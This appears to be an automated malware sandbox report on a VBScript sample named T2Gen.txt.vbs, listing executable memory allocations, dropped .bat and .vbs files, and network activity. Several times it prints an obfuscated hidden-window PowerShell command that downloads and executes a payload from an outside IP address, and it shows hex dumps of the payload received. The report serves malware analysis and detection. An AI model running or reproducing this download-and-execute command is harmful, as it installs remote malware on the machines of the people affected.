NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02819000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0281a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0281b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0281c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0281d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0281e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0281f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02821000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02822000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02823000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02824000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\libraries.bat
file	C:\Users\Public\libraries.vbs

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 20, 2023, 5:34 p.m.	show_type: 0 filepath_r: POWeRSHeLL.eXe parameters: -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) filepath: POWeRSHeLL.eXe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 20, 2023, 5:34 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received

0!70!6F!A6!00!00!06!25!72!2D!22!00!70!6F!A4!00!00!06!28!F4!00!00!0A!6F!A6!00!00!06!6F!AE!00!00!06!28!20!00!00!06!2A!5E!02!28!1C!00!00!0A!03!6F!22!00!00!0A!28!71!00!00!06!28!F8!00!00!0A!2A!5E!28!1C!00!00!0A!02!03!28!1D!00!00!0A!28!73!00!00!06!6F!1E!00!00!0A!2A!62!1F!20!8D!48!00!00!01!25!D0!43!00!00!04!28!0E!01!00!0A!80!42!00!00!04!2A!32!7E!44!00!00!04!02!6F!22!00!00!0A!2A!32!7E!44!00!00!04!02!6F!1E!00!00!0A!2A!32!02!28!13!01!00!0A!28!7D!00!00!06!2A!8E!1A!8D!48!00!00!01!25!19!02!D2!9C!25!18!02!1E!63!D2!9C!25!17!02!1F!10!63!D2!9C!25!16!02!1F!18!63!D2!9C!2A!4E!18!8D!48!00!00!01!25!17!02!D2!9C!25!16!02!1E!63!D2!9C!2A!32!02!28!14!01!00!0A!28!7D!00!00!06!2A!2E!73!15!01!00!0A!80!44!00!00!04!2A!56!02!15!7D!46!00!00!04!02!28!1B!00!00!0A!02!03!7D!45!00!00!04!2A!4A!02!7B!45!00!00!04!02!7B!46!00!00!04!6F!16!01!00!0A!2A!8A!02!02!7B!46!00!00!04!17!58!7D!46!00!00!04!02!7B!46!00!00!04!02!7B!45!00!00!04!6F!17!01!00!0A!FE!04!2A!22!02!15!7D!46!00!00!04!2A!56!02!28!1B!00!00!0A!02!03!7D!48!00!00!04!02!04!7D!47!00!00!04!2A!32!02!7B!48!00!00!04!6F!96!00!00!06!2A!4E!02!7B!48!00!00!04!6F!96!00!00!06!25!03!6F!B1!00!00!06!2A!4E!02!7B!48!00!00!04!6F!96!00!00!06!25!03!6F!99!00!00!06!2A!4E!02!7B!48!00!00!04!6F!96!00!00!06!25!03!6F!AA!00!00!06!2A!36!02!7B!47!00!00!04!03!6F!16!01!00!0A!2A!32!02!7B!47!00!00!04!6F!17!01!00!0A!2A!66!02!03!7D!49!00!00!04!02!02!7B!49!00!00!04!6F!80!00!00!0A!7D!4A!00!00!04!2A!82!02!7B!4C!00!00!04!18!3B!0D!00!00!00!02!28!90!00!00!06!02!18!7D!4C!00!00!04!02!28!91!00!00!06!2A!82!02!7B!4C!00!00!04!19!3B!0D!00!00!00!02!28!90!00!00!06!02!19!7D!4C!00!00!04!02!28!91!00!00!06!2A!1E!02!28!95!00!00!06!2A!52!02!03!8C!6B!00!00!01!7D!4B!00!00!04!02!1B!7D!4C!00!00!04!2A!52!02!03!8C!A4!00!00!01!7D!4B!00!00!04!02!1C!7D!4C!00!00!04!2A!42

Data received

0!13!30!04!00!08!00!00!00!01!00!00!11!02!16!7D!2B!00!00!04!2A!13!30!05!00!BB!00!00!00!01!00!00!11!02!7B!2B!00!00!04!1A!34!48!20!26!EC!87!D3!20!CD!0F!8C!A2!61!25!0A!1D!5E!45!07!00!00!00!D0!FF!FF!FF!43!00!00!00!73!00!00!00!53!00!00!00!02!00!00!00!33!00!00!00!18!00!00!00!2B!71!02!16!7D!2B!00!00!04!06!20!F2!E8!DE!16!5A!20!87!37!41!EA!61!2B!BD!02!7B!2B!00!00!04!1F!0A!34!08!20!B7!60!D3!D8!25!2B!06!20!C9!21!2D!FC!25!26!2B!A2!2A!06!20!77!5D!D0!0D!5A!20!F2!27!36!BD!61!2B!92!2A!06!20!8A!91!00!FF!5A!20!B1!90!F7!50!61!2B!82!02!25!7B!2B!00!00!04!19!59!7D!2B!00!00!04!06!20!2C!F5!43!3C!5A!20!68!1B!73!85!61!38!62!FF!FF!FF!02!25!7B!2B!00!00!04!1C!59!7D!2B!00!00!04!2A!00!13!30!05!00!15!00!00!00!01!00!00!11!02!02!7B!2B!00!00!04!1D!37!04!1F!0A!2B!01!1D!7D!2B!00!00!04!2A!00!00!00!13!30!05!00!15!00!00!00!01!00!00!11!02!02!7B!2B!00!00!04!1D!37!04!1F!0B!2B!01!1E!7D!2B!00!00!04!2A!00!00!00!13!30!05!00!16!00!00!00!01!00!00!11!02!02!7B!2B!00!00!04!1D!37!04!1F!0B!2B!02!1F!09!7D!2B!00!00!04!2A!00!00!13!30!04!00!0A!00!00!00!01!00!00!11!02!7B!2B!00!00!04!1D!FE!05!2A!00!00!13!30!04!00!57!00!00!00!0E!00!00!11!00!20!85!6B!FC!50!20!FD!AD!77!4B!61!25!0B!19!5E!45!03!00!00!00!34!00!00!00!02!00!00!00!E0!FF!FF!FF!2B!32!0F!00!28!39!00!00!06!0F!01!28!3A!00!00!06!D0!01!00!00!1B!28!15!00!00!0A!28!1F!00!00!0A!A5!01!00!00!1B!0A!07!20!9A!7A!E1!5E!5A!20!DF!08!3D!90!61!2B!B1!06!2A!00!13!30!07!00!80!00!00!00!0F!00!00!11!00!20!AC!EE!5A!85!20!C3!CD!10!97!61!25!0C!1B!5E!45!05!00!00!00!1C!00!00!00!46!00!00!00!55!00!00!00!02!00!00!00!D8!FF!FF!FF!2B!53!20!22!CD!8D!98!28!01!00!00!2B!0A!08!20!45!32!C7!3A!5A!20!2D!13!97!C8!61!2B!C1!06!17!8D!21!00!00!01!25!16!20!46!83!02!3D!28!02!00!00!2B!A2!16!6F!20!00!00!0A!0B!08!20!08!F8!0A!45!5A!20!9D!68!16!1C!61!2B!97!08!20!D8!E6!05!2B!5A!20!A0!70!4B!95!61!2B!88!07!2A!13!30!03!00!39!00!00!00!01!00!00!11!02!28!1C!00!00!0A!20!2A!3B!8B!68!20!5B!AE!0F!6E!61!25!0A!19!5E!45!03!00!00!00!12!00!00!00!02!00!00!00!E0!FF!FF!FF!2B!10!00!06!20!18!58!AE!D5!5A!20!CC!76!FA!D0!61!2B!D3!2A!00!00!00!13!30!05!00!E4!01!00!00!01!00!00!11!28!3C!00!00!06!16!9A!28!21!00!00!0A!28!3C!00!00!06!18!9A!28!21!00!00!0A!28!03!00!00!2B!80!2C!00!00!04!20!A9!16!FA!93!20!6F!30!9B!82!61!25!0A!1D!5E!45!07!00!00!00!6E!01!00!00!6B!00!00!00!05!01!00!00!37!00!00!00!05!00!00!00!D0!FF!FF!FF!39!01!00!00!38!69!01!00!00!28!3C!00!00!06!16!9A!28!21!00!00!0A!28!3C!00!00!06!1F!09!9A!28!21!00!00!0A!28!04!00!00!2B!80!33!00!00!04!06!20!32!55!D7!43!5A!20!C8!E2!5B!37!61!2B!9E!28!3C!00!00!06!16!9A!28!21!00!00!0A!28!3C!00!00!06!1D!9A!28!21!00!00!0A!28!05!00!00!2B!80!31!00!00!04!06!20!57!AC!31!AF!5A!20!8A!8C!71!AA!61!38!6A!FF!FF!FF!28!3C!00!00!06!16!9A!28!21!00!00!0A!28!3C!00!00!06!19!9A!28!21!00!00!0A!28!06!00!00!2B!80!2D!00!00!04!28!3C!00!00!06!16!9A!28!21!00!00!0A!28!3C!00!00!06!1A!9A!28!21!00!00!0A!28!07!00!00!2B!80!2E!00!00!04!28!3C!00!00!06!16!9A!28!21!00!00!0A!28!3C!00!00!06!1B!9A!28!21!00!00!0A!28!08!00!00!2B!80!2F!00!00!04!28!3C!00!00!06!16!9A!28!21!00!00!0A!28!3C!00!00!06!1C!9A!28!21!00!00!0A!28!09!00!00!2B!80!30!00!00!04!06!20!F1!25!03!5C!5A!20!0E!B4!26!A0!61!38!D0!FE!FF!FF!28!3C!00!00!06!16!9A!28!21!00!00!0A!28!3C!00!00!06!1E!9A!28!21!00!00!0A!28!0A!00!00!2B!80!32!00!00!04!06!20!F0!3E!C7!B6!5A!20!BC!9F!95!BA!61!38!9C!FE!FF!FF!28!3C!00!00!06!17!9A!28!21!00!00!0A!28!3C!00!00!06!1F!0A!9A!28!21!00!00!0A!28!0B!00!00!2B!80!34!00!00!04!06!20!A8!4B!A4!A5!5A!20!73!88!99!71!61!38!67!FE!FF!FF!28!3C!00!00!06!16!9A!28!21!00!00!0A!28!3C!00!00!06!1F!0B!9A!28!21!00!00!0A!28!0C!00!00!2B!80!35!00

Poweshell is sending data to a remote host (1 event)

Data sent

GET /T2.jpg HTTP/1.1 Host: 185.81.157.213:222 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 20, 2023, 5:34 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

185.81.157.213

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Oct. 20, 2023, 5:34 p.m.	buffer: GET /T2.jpg HTTP/1.1 Host: 185.81.157.213:222 Connection: Keep-Alive socket: 1420 sent: 74	1	74	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Creates a suspicious Powershell process (8 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

T2Gen.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All